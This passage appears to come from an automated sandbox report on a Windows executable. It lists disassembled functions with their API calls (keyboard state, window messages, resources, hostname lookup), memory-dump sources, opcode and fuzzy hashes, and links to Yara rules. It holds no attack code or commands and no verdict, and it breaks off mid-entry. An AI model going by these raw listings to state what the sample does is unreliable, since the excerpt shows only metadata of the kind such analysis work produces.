                • _wprintf.LIBCMT ref: 0044E8A0
                • _wprintf.LIBCMT ref: 0044E8C4
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-2354261254
                • Opcode ID: 3c7e612212daed889b97e6f571fe511d88a899764a78f4fecf1c616e322fbe5b
                • Instruction ID: dae766faff26361e783e20bb964aa36d0ce899da33e9b7c0947476cd92b21ef4
                • Opcode Fuzzy Hash: 3c7e612212daed889b97e6f571fe511d88a899764a78f4fecf1c616e322fbe5b
                • Instruction Fuzzy Hash: 0A516D71A10219ABEB15EFA1DC81EFF7378EF44750F50442AFA046B241DB74AE45CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00443126, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __swprintf_wcscpy$__i64tow__itow
                • String ID: %.15g$0x%p$False$True
                • API String ID: 3038501623-2263619337
                • Opcode ID: def2c2966ce522e80cf8aed454b2e47f1a10abda0473fd25f3042b3a4e5489c7
                • Instruction ID: 2f51469873c9bd62b2cfb18948fb71a25a5236483e75e8f0255a68ebe277a268
                • Opcode Fuzzy Hash: def2c2966ce522e80cf8aed454b2e47f1a10abda0473fd25f3042b3a4e5489c7
                • Instruction Fuzzy Hash: B14127729001149BE710EF74DC82F6A7368EF45701F0445FFE909DB291EA79DA08879A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044E525, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                Download Yara Rule
                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0044E56D
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0044E58C
                • __swprintf.LIBCMT ref: 0044E5E3
                • _wprintf.LIBCMT ref: 0044E690
                • _wprintf.LIBCMT ref: 0044E6B4
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-8599901
                • Opcode ID: 74f248ee9ecdd0afcc369c800c51a69e3490e16888627e79fa8d73e208e51d7f
                • Instruction ID: bade26b963e1a3ff7f171a98377681a1436cada00aa39cfb31cbf183f97e4c7f
                • Opcode Fuzzy Hash: 74f248ee9ecdd0afcc369c800c51a69e3490e16888627e79fa8d73e208e51d7f
                • Instruction Fuzzy Hash: 71518371E00209ABDB15EBA1D881DFFB778EF44350F60842AF9156B241DB74AE45CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044268F, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __fread_nolock$_fseek_wcscpy
                • String ID: FILE
                • API String ID: 3888824918-3121273764
                • Opcode ID: b15827abcb44483965bac270325a54d034279a0074f174609de7c831d226bd21
                • Instruction ID: 7f89af1aba0b5868691293e7a12a15dad39b65c7bd6c734a7c6541802d4c640e
                • Opcode Fuzzy Hash: b15827abcb44483965bac270325a54d034279a0074f174609de7c831d226bd21
                • Instruction Fuzzy Hash: C041CCB2900204B7EB20EF95DC81FEF737DEF98704F14456EBA04A7181E6B99644CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00433A65, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                Download Yara Rule
                APIs
                • timeGetTime.WINMM ref: 00433A6B
                  • Part of subcall function 003FC870: timeGetTime.WINMM(0041DCE3), ref: 003FC870
                • Sleep.KERNEL32(0000000A), ref: 00433AA3
                • FindWindowExW.USER32 ref: 00433ACC
                • SetActiveWindow.USER32(00000000), ref: 00433AF0
                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00433B00
                • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00433B26
                • Sleep.KERNEL32(000000FA), ref: 00433B31
                • IsWindow.USER32(00000000), ref: 00433B3E
                • EndDialog.USER32(00000000,00000000), ref: 00433B50
                  • Part of subcall function 004338C5: GetWindowThreadProcessId.USER32(?,00000000), ref: 004338E8
                  • Part of subcall function 004338C5: GetCurrentThreadId.KERNEL32 ref: 004338EF
                  • Part of subcall function 004338C5: AttachThreadInput.USER32(00000000), ref: 004338F6
                • EnumThreadWindows.USER32(00000000,Function_00033CEE,00000000), ref: 00433B6F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                • String ID: BUTTON
                • API String ID: 1834419854-3405671355
                • Opcode ID: 8bfbafca80ef5f1a99dc9e052bfb054f75348f61f0d5841f851a0ca9c99f8cbf
                • Instruction ID: 2bae0fc0bfc53142e5f5b2895cdf632d63b2eedc17b246a09764132b363a3e8d
                • Opcode Fuzzy Hash: 8bfbafca80ef5f1a99dc9e052bfb054f75348f61f0d5841f851a0ca9c99f8cbf
                • Instruction Fuzzy Hash: EB31D572744200BBE3249F65FD49F167758E754B32F200137F604EA2A1C6B5E58187BC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00423478, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 84networkCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcscpy$Cleanup$Startup_memmovegethostbynamegethostnameinet_ntoa
                • String ID: 0.0.0.0
                • API String ID: 3306283345-3771769585
                • Opcode ID: 22c8db947f8dad06b766f6a3f71108d3aa430f2451383148bc3fcd989c273c9a
                • Instruction ID: a9f690dce169051fdff21b1b5d8b02fe957e42f6348a752e3bba0adeb178d29f
                • Opcode Fuzzy Hash: 22c8db947f8dad06b766f6a3f71108d3aa430f2451383148bc3fcd989c273c9a
                • Instruction Fuzzy Hash: DD212B32A001146BC714AF68ED05EFE737CDF84316F0041ABF90DA2191EEB99A8587A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00443BCC, Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 00443C55
                • SetKeyboardState.USER32(?), ref: 00443CB0
                • GetAsyncKeyState.USER32(000000A0), ref: 00443CD3
                • GetKeyState.USER32(000000A0), ref: 00443CEA
                • GetAsyncKeyState.USER32(000000A1), ref: 00443D19
                • GetKeyState.USER32(000000A1), ref: 00443D2A
                • GetAsyncKeyState.USER32(00000011), ref: 00443D56
                • GetKeyState.USER32(00000011), ref: 00443D64
                • GetAsyncKeyState.USER32(00000012), ref: 00443D8D
                • GetKeyState.USER32(00000012), ref: 00443D9B
                • GetAsyncKeyState.USER32(0000005B), ref: 00443DC4
                • GetKeyState.USER32(0000005B), ref: 00443DD2
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 978ecc304a78f049189a000c3c2cdf9ad46633cba379510e157c454a6f04294d
                • Instruction ID: f3c9976642e7cb5138a5d95fe1642cd097b63d59394cbe4f46ca8501a604ccb6
                • Opcode Fuzzy Hash: 978ecc304a78f049189a000c3c2cdf9ad46633cba379510e157c454a6f04294d
                • Instruction Fuzzy Hash: 2A61F761D047C829FB359F6488457EBBBF45F12B05F08458FD5C1262C2D6ACAB8CC76A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004257C5, Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                Download Yara Rule
                APIs
                • GetDlgItem.USER32 ref: 004257E9
                • GetWindowRect.USER32 ref: 004257FB
                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00425865
                • GetDlgItem.USER32 ref: 00425878
                • GetWindowRect.USER32 ref: 0042588A
                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004258DC
                • GetDlgItem.USER32 ref: 004258EA
                • GetWindowRect.USER32 ref: 004258FC
                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00425941
                • GetDlgItem.USER32 ref: 0042594F
                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00425968
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00425975
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$ItemMoveRect$Invalidate
                • String ID:
                • API String ID: 3096461208-0
                • Opcode ID: 1a156b492134016be48ce1e841245e22fb72a6b65cdec7b5249dec508c8cb1b8
                • Instruction ID: 3f995e88ba6991ae784cd92df6dfd51c04ff64140bbb2b55f0f104586c487c70
                • Opcode Fuzzy Hash: 1a156b492134016be48ce1e841245e22fb72a6b65cdec7b5249dec508c8cb1b8
                • Instruction Fuzzy Hash: 8E515171B00619ABCB18DF68DD95AAEB7B6FB88310F14812AF905E7390D774ED408B54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00423769, Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                • String ID:
                • API String ID: 136442275-0
                • Opcode ID: f44b64b18f6ea7c983eec9a8234630f8d9fd218802d3b96fa03112008226ce0d
                • Instruction ID: e09d71bffdd76d7f25ef183c66ced68e275b485ed7a432a3731220a6f1bc0bc5
                • Opcode Fuzzy Hash: f44b64b18f6ea7c983eec9a8234630f8d9fd218802d3b96fa03112008226ce0d
                • Instruction Fuzzy Hash: A04194B390022C6ACB25EB51CC41DEE737CAF88305F4086DEF50966141EA796BC88FA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00440BB7, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DestroyWindow
                • String ID: static
                • API String ID: 3375834691-2160076837
                • Opcode ID: 367e45a23e01da11acf6408796a860ff4470f9fdf76e3b2d2a198bee4c0c62da
                • Instruction ID: fe836fd85a507e37e848a599f0887400fdb723dd3b87ecf4fc1ecfda0f929e96
                • Opcode Fuzzy Hash: 367e45a23e01da11acf6408796a860ff4470f9fdf76e3b2d2a198bee4c0c62da
                • Instruction Fuzzy Hash: 16416071210215ABEB149F64DC85FEB33A9EB99724F20432AFA14D72C0D7B4EC51CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043807C, Relevance: 16.7, APIs: 11, Instructions: 187windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00438101
                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00438104
                • GetWindowLongW.USER32(?,000000F0), ref: 00438128
                • _memset.LIBCMT ref: 00438139
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0043814B
                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004381BF
                • SendMessageW.USER32(?,00001074,?,00000007), ref: 0043820D
                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00438228
                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 0043824A
                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00438261
                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00438279
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$LongWindow_memset
                • String ID:
                • API String ID: 830647256-0
                • Opcode ID: cae8bf7d5067cf787fbc8b2641cd5665346cc35fb08136c3c441a9748bdc0465
                • Instruction ID: 9c602aaad70e63dd7addc4b49f49efdb7b1edaa7fde9ff14218c9ff70419c54a
                • Opcode Fuzzy Hash: cae8bf7d5067cf787fbc8b2641cd5665346cc35fb08136c3c441a9748bdc0465
                • Instruction Fuzzy Hash: D0616D75A00208AFDB10DF98DC85FEE77B8BF49314F10419AF914AB391DBB4AA45CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0046931C, Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                Download Yara Rule
                APIs
                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004695B7), ref: 0046933A
                • SafeArrayAllocData.OLEAUT32(004695B7), ref: 00469389
                • VariantInit.OLEAUT32(?), ref: 0046939B
                • SafeArrayAccessData.OLEAUT32(004695B7,?), ref: 004693BC
                • VariantCopy.OLEAUT32(?,?), ref: 0046941B
                • SafeArrayUnaccessData.OLEAUT32(004695B7), ref: 0046942E
                • VariantClear.OLEAUT32(?), ref: 00469443
                • SafeArrayDestroyData.OLEAUT32(004695B7), ref: 00469468
                • SafeArrayDestroyDescriptor.OLEAUT32(004695B7), ref: 00469472
                • VariantClear.OLEAUT32(?), ref: 00469484
                • SafeArrayDestroyDescriptor.OLEAUT32(004695B7), ref: 004694A1
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                • String ID:
                • API String ID: 2706829360-0
                • Opcode ID: abd10900d825b18f5accc6c1e6e8991776e8cc8ba1cf1bc94a6ffc1f93b25f13
                • Instruction ID: 27d91888a2664f50aee10a74df4e9fb1592295043d6ee1971b424155b0a676b6
                • Opcode Fuzzy Hash: abd10900d825b18f5accc6c1e6e8991776e8cc8ba1cf1bc94a6ffc1f93b25f13
                • Instruction Fuzzy Hash: AC514076A0021DABCB00DFE4DD849EEB7B9FF48304F10456AE905A7201DB75DE46CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004346C5, Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 004346F3
                • GetAsyncKeyState.USER32(000000A0), ref: 0043477E
                • GetKeyState.USER32(000000A0), ref: 0043478F
                • GetAsyncKeyState.USER32(000000A1), ref: 004347AD
                • GetKeyState.USER32(000000A1), ref: 004347BE
                • GetAsyncKeyState.USER32(00000011), ref: 004347DA
                • GetKeyState.USER32(00000011), ref: 004347E8
                • GetAsyncKeyState.USER32(00000012), ref: 00434804
                • GetKeyState.USER32(00000012), ref: 00434812
                • GetAsyncKeyState.USER32(0000005B), ref: 0043482E
                • GetKeyState.USER32(0000005B), ref: 0043483D
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 587226cd530c537e3bf8a3c5e801d9c05b66781305e7bf1b92926d92b478a5b2
                • Instruction ID: 0707c2e9391334560a2dfc1bbf6522f56aea6f47f04c74b493afcf129188439c
                • Opcode Fuzzy Hash: 587226cd530c537e3bf8a3c5e801d9c05b66781305e7bf1b92926d92b478a5b2
                • Instruction Fuzzy Hash: C54106346047CA29FF35966488043E7BAE16BAB310F04909BD5C5077C1D7EDB9C8C7AA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00423044, Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                Download Yara Rule
                APIs
                • __swprintf.LIBCMT ref: 00423058
                • __swprintf.LIBCMT ref: 0042306A
                • __wcsicoll.LIBCMT ref: 00423077
                • FindResourceW.KERNEL32(?,?,0000000E), ref: 0042308A
                • LoadResource.KERNEL32(?,00000000), ref: 004230A2
                • LockResource.KERNEL32(00000000), ref: 004230AF
                • FindResourceW.KERNEL32(?,?,00000003), ref: 004230DC
                • LoadResource.KERNEL32(?,00000000), ref: 004230EA
                • SizeofResource.KERNEL32(?,00000000), ref: 004230F9
                • LockResource.KERNEL32(?), ref: 00423105
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                • String ID:
                • API String ID: 1158019794-0
                • Opcode ID: a89369ce411b1882b04e1ffb186a1630d3f51cae4a291a29fae113f1658becc5
                • Instruction ID: 4d2f44a84d96f59ca1a38ec429739f0f5ab470209ebebff79e2eeb53e661ebfb
                • Opcode Fuzzy Hash: a89369ce411b1882b04e1ffb186a1630d3f51cae4a291a29fae113f1658becc5
                • Instruction Fuzzy Hash: 0841F3326042286BC720DF64EC84FAB77BDEB89301F40846AF905D6245EB79DA51C7B8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00440566, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00440616
                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0044062A
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0044064B
                • _wcslen.LIBCMT ref: 00440696
                • _wcscat.LIBCMT ref: 004406A9
                • SendMessageW.USER32(?,00001057,00000000,?), ref: 004406C2
                • SendMessageW.USER32(?,00001061,?,?), ref: 004406F4
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window_wcscat_wcslen
                • String ID: -----$SysListView32
                • API String ID: 4008455318-3975388722
                • Opcode ID: 5067eef2fb1db3bd9c566ee10f56890b12aa1800011e53f636904f23535ce9e6
                • Instruction ID: ad6b7ad60e6b5491ea889048fe5483f0ccb586868e97feb3a549f88ca9a2d821
                • Opcode Fuzzy Hash: 5067eef2fb1db3bd9c566ee10f56890b12aa1800011e53f636904f23535ce9e6
                • Instruction Fuzzy Hash: 0B51A470600308ABEB24CF65DC89FEB77A5EF98304F10451EF649A72C1D7B99994CB58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00438524, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109windowCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                • String ID: 0
                • API String ID: 176399719-4108050209
                • Opcode ID: 4bf97de4df8a4edc629308afba843b35ff7e0f10493062c026a9954e731c7471
                • Instruction ID: f747358ac4455cfe1be4ca3fc91d7c88c3018ed20b3ccad4fda5457f03a41bf9
                • Opcode Fuzzy Hash: 4bf97de4df8a4edc629308afba843b35ff7e0f10493062c026a9954e731c7471
                • Instruction Fuzzy Hash: AD418C75A00209AFCB00CFA8D884A9AB7B4FF4D310F14816AFD189B341DB74A851CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00438CBB, Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00431331: DeleteObject.GDI32(?), ref: 00431392
